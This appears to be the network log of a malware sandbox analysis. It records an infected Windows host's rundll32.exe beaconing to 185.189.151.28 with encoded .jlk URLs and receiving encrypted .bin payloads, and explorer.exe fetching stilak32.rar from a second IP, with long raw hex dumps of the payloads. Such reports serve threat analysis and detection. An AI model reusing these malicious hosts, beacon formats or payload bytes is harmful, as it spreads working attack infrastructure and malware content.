                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.449761185.189.151.2880C:\Windows\SysWOW64\rundll32.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:19:17.575335979 CEST1167OUTGET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:17.863269091 CEST1168INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:17 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 186001
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b65cf5d2.bin"
                                                        Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                                                        Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
                                                        May 4, 2022 16:19:17.863297939 CEST1169INData Raw: 7c e5 07 28 e7 97 88 65 8c 42 65 12 be 3c 6e 38 dd ae 31 b0 00 6d 67 0c 0c 1b ef cc 43 84 5e 73 ad 05 a5 dd 1f bd d3 3a d0 a2 96 f6 61 1d 21 dc f0 ae ff ab fe de df b7 31 57 f7 18 f7 dd 5a e1 9d 99 3e cb a0 6b 6f 9c c6 53 97 06 dc 65 2d e0 e5 5a
                                                        Data Ascii: |(eBe<n81mgC^s:a!1WZ>koSe-Z0QW&'S*6RRM}ix# &am41^2Cha/Zf=(oUdv$PQd7n-45kWPw2tI:j`=|Q#No{
                                                        May 4, 2022 16:19:17.863331079 CEST1171INData Raw: 81 01 21 13 1b 0e fa 23 7a 85 b2 5f a7 1a f1 b0 f3 10 cd 90 bb 13 4e cc 62 ab 26 e9 45 51 ea 2b 1c 30 5f 1d 40 3b f5 32 9c 85 e3 8c 2f 0b fb 03 03 12 18 20 c6 e9 54 d0 0f 9d c2 9a 7a 02 7d 4f bd 74 79 e9 d8 dc 36 04 92 80 fc 2b aa 0e 72 6b 54 61
                                                        Data Ascii: !#z_Nb&EQ+0_@;2/ Tz}Oty6+rkTa@*9If1=f6_"zKT(}X<[Zvero-b8(Zl=a*<qfC^[]g?[$X8CN ANy!6c9U8
                                                        May 4, 2022 16:19:17.863353014 CEST1172INData Raw: 07 65 8e 45 2f ff a8 5f 21 88 ac fd 2f 32 fe 2b 28 01 00 29 3b d8 eb 1d 6b 8b 6a 47 f2 9b 12 cf 02 a7 1d 66 e8 ae b6 d4 c5 df c6 46 41 d9 95 a0 dc a2 67 35 3e 19 fc 5a f0 10 4c 2e e1 7e 0c 48 cf aa 36 fe 2e 2a 12 d9 1b 10 09 ed 5a b4 c7 82 3e 33
                                                        Data Ascii: eE/_!/2+();kjGfFAg5>ZL.~H6.*Z>3glGh0'ZO\6p`Da__3@{{WOXB0Mo{/>EADKER-j9-gQ75O{^Ng5:g"~'zj\[|
                                                        May 4, 2022 16:19:17.863687038 CEST1174INData Raw: 1d 9b 5a 47 2d 4e 6f 98 87 ad a5 6a 1e c6 3c 05 be 48 cc ba 1d d3 5b f8 f8 68 df 7d a2 95 56 2b 44 cd c8 e4 e3 f7 13 04 20 18 62 b0 f0 c0 91 a9 fb 0a 42 a5 3c fe 9a 56 07 98 40 e1 9b fd 9d 93 bd 63 29 a9 24 44 c6 cb 9c 99 e6 18 86 f2 c0 4d a5 7c
                                                        Data Ascii: ZG-Noj<H[h}V+D bB<V@c)$DM|j\LD!"tcM%? \~jv_ac4g7u}K*cu[j,nQ%.>87H5-A/4]?ZK?%@#qMK^CZ)0w
                                                        May 4, 2022 16:19:17.863704920 CEST1175INData Raw: 9b 32 44 85 0e 85 38 a8 96 86 b8 32 31 f8 fb 3f ce 22 69 e4 88 7f 5c bd 56 b9 0b 9a 8a 57 77 6e b3 18 8b 80 b7 43 c0 79 ea 9b 59 46 3a 4c a3 9c 4a 63 37 a4 f1 b8 e1 18 15 40 18 90 52 0c 7a 25 70 39 a0 65 ac 7b d9 19 95 b7 8c 3d 06 9d 2c 50 9a d1
                                                        Data Ascii: 2D821?"i\VWwnCyYF:LJc7@Rz%p9e{=,P>G6fDZ6{)gHvgq)#ch.za0b_T=a!#w/%q!5B|;poiMucE[}?#VLa9QK:&,*1v
                                                        May 4, 2022 16:19:17.864097118 CEST1175INData Raw: 89 37 ef 5e 93 27 61 3b e9 d7 bd c9 f4 ce e8 59 f5 fd 64 51 6a 34 7d 33 aa 72 b7 f1 13 4d d4 e1 b0 ff 11 e8 25 84 f0 e7 04 e9 6a fe 55 85 7c 74 94 a0 57 7e 02 c5 4f f4 df 98 a2 c6 f8 10 63 c2 71 bf f4 af 1e 11 1d 77 86 74 8d 7b a5 49 df 1c 2d 27
                                                        Data Ascii: 7^'a;YdQj4}3rM%jU|tW~Ocqwt{I-'}l/TI-4_*hQXe&$x`;_#9SgDNqhN3$l
                                                        May 4, 2022 16:19:17.864460945 CEST1177INData Raw: 88 50 d8 44 f9 d4 c5 f5 b1 f6 1a 90 ec d5 e7 7f eb fe f7 51 81 b8 b6 2f 71 54 61 3b 2c 6c ff d5 5f 43 c9 a5 e9 6c 29 60 41 fa 81 d6 0b c4 e1 3b 4f 05 51 03 69 fe 18 ce f9 35 fc d7 42 ad a1 fe d8 cf 1f 00 a9 0a 2f b6 2e be 9e a4 d5 8e 5a db 2a 91
                                                        Data Ascii: PDQ/qTa;,l_Cl)`A;OQi5B/.Z*klxhW&3Y|G8\1)/6J<fyLR50va"m!g4qD[;\gXtYyY5B!LK
                                                        May 4, 2022 16:19:17.864502907 CEST1178INData Raw: e8 4a 0b 3e 64 a1 a4 64 7b 92 28 ee d1 b9 eb 1a 50 fa a2 f4 e4 26 b2 fa c4 65 e3 9c b2 75 ed 35 91 4b 00 6e 97 6f e9 9f c9 31 89 1d fa c4 bb 24 d5 0f c0 9d 4e 9c 0b 95 07 77 1e ba 06 f5 d8 45 af 3c 1b 46 44 f6 ba 2c ea 0e e6 20 67 bf 0c 3b a6 56
                                                        Data Ascii: J>dd{(P&eu5Kno1$NwE<FD, g;V+K_>?[&>012;Ye].fr0Km$9/@7Us=Ju&=hDs>g0J^*_k?!)y&u^1'37Nm3{%O?<W\iq
                                                        May 4, 2022 16:19:17.864698887 CEST1180INData Raw: a6 99 8e 66 a4 ed 14 8a 56 de 76 54 16 9c 8c 6c b7 09 36 ac b9 8c 34 07 25 93 b3 77 cd be d2 ac 71 60 cb 63 e5 ae 4c b3 57 76 16 48 ba 0b b0 d3 c6 9c 3b 53 2e 75 0f 8c f2 d8 06 e1 ea d6 e3 10 58 4d 41 71 45 c8 41 73 11 73 8b 24 28 df 23 e1 af c5
                                                        Data Ascii: fVvTl64%wq`cLWvH;S.uXMAqEAss$(#:s\V~bq2swU)M@U/=k[$fn(Z5%a<CW63K0zkkQL*yRrxF}|)Y#v#qg(eMW/MkV
                                                        May 4, 2022 16:19:17.880639076 CEST1181INData Raw: c8 07 22 36 95 02 0c 58 e3 79 59 76 89 c8 79 5a ab 13 0c d7 6a d3 82 82 49 3f 35 a0 e3 78 3a b9 9b a4 ee b3 81 5e 2a 58 4b 6e cf 63 59 96 95 f4 e1 31 45 3b 08 47 16 d6 4e 32 79 d7 67 09 2d 48 da 84 71 95 f9 b3 95 32 4a 8f 36 5c e0 9a 18 25 db 69
                                                        Data Ascii: "6XyYvyZjI?5x:^*XKncY1E;GN2yg-Hq2J6\%i6'.It\9hW.]YR*0NTt<^HA5n=y]3~wB;i981l5|Z._F47D,qv=w]I6V[
                                                        May 4, 2022 16:19:18.765868902 CEST1367OUTGET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:19.058303118 CEST1368INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:19 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 238738
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b670adf7.bin"
                                                        Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                                                        Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                                                        May 4, 2022 16:19:19.326271057 CEST1619OUTGET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:19.626909018 CEST1620INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:19 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1856
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b6793eb1.bin"
                                                        Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                                                        Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.449823193.56.146.12780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:21:18.561359882 CEST11244OUTGET /stilak32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:18.631387949 CEST11245INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:18 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 345746
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-54692"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 45 3c 14 4b d0 5d 55 6d d6 39 03 77 c9 7b 8d 6f 22 6a 6a 86 75 9f 21 88 39 51 b9 54 4f 5d 8b 01 83 84 88 c3 c4 e9 b8 f5 df 9b 8c f7 18 3e 22 a4 54 ec cd c8 8b 25 85 47 35 c2 03 d7 74 4b 62 07 1b bb 2d da 89 3a ff f7 f1 ad 45 c1 72 6b db 20 53 03 5c 8d 35 28 67 e8 c8 30 4d 21 98 3c 54 88 2e ff ed e8 2f f1 af fd 4d 6e 64 3a ff cd 30 06 70 c6 c3 c7 1c 6b 06 eb 14 2e fd fb 26 d0 4a 85 ee d4 63 44 d5 4e b6 98 b9 71 80 5c 45 f3 51 26 7a 06 4e 3e 71 04 31 10 c4 e7 9f 57 ea 5a 58 95 cc b9 a4 ff 59 f5 00 06 ee 0b ec 97 ae 6a e1 6b 4b 1e 7f 0c 3e ae 18 69 c7 1e 51 2b 48 08 72 9c 92 de 9e c7 bb 90 a4 47 92 f5 78 c0 ee 8a 9d 27 a5 b1 92 4b 5f e9 30 e2 11 ec 49 67 c8 06 45 e7 20 10 c6 8d 8c e4 90 8e 61 66 c6 55 d8 aa c6 cc e4 41 f1 71 48 ff bb 80 0c 36 7a 64 1e 9b 75 49 85 63 8f c6 f5 2f b3 0d 60 ee c9 58 13 13 e5 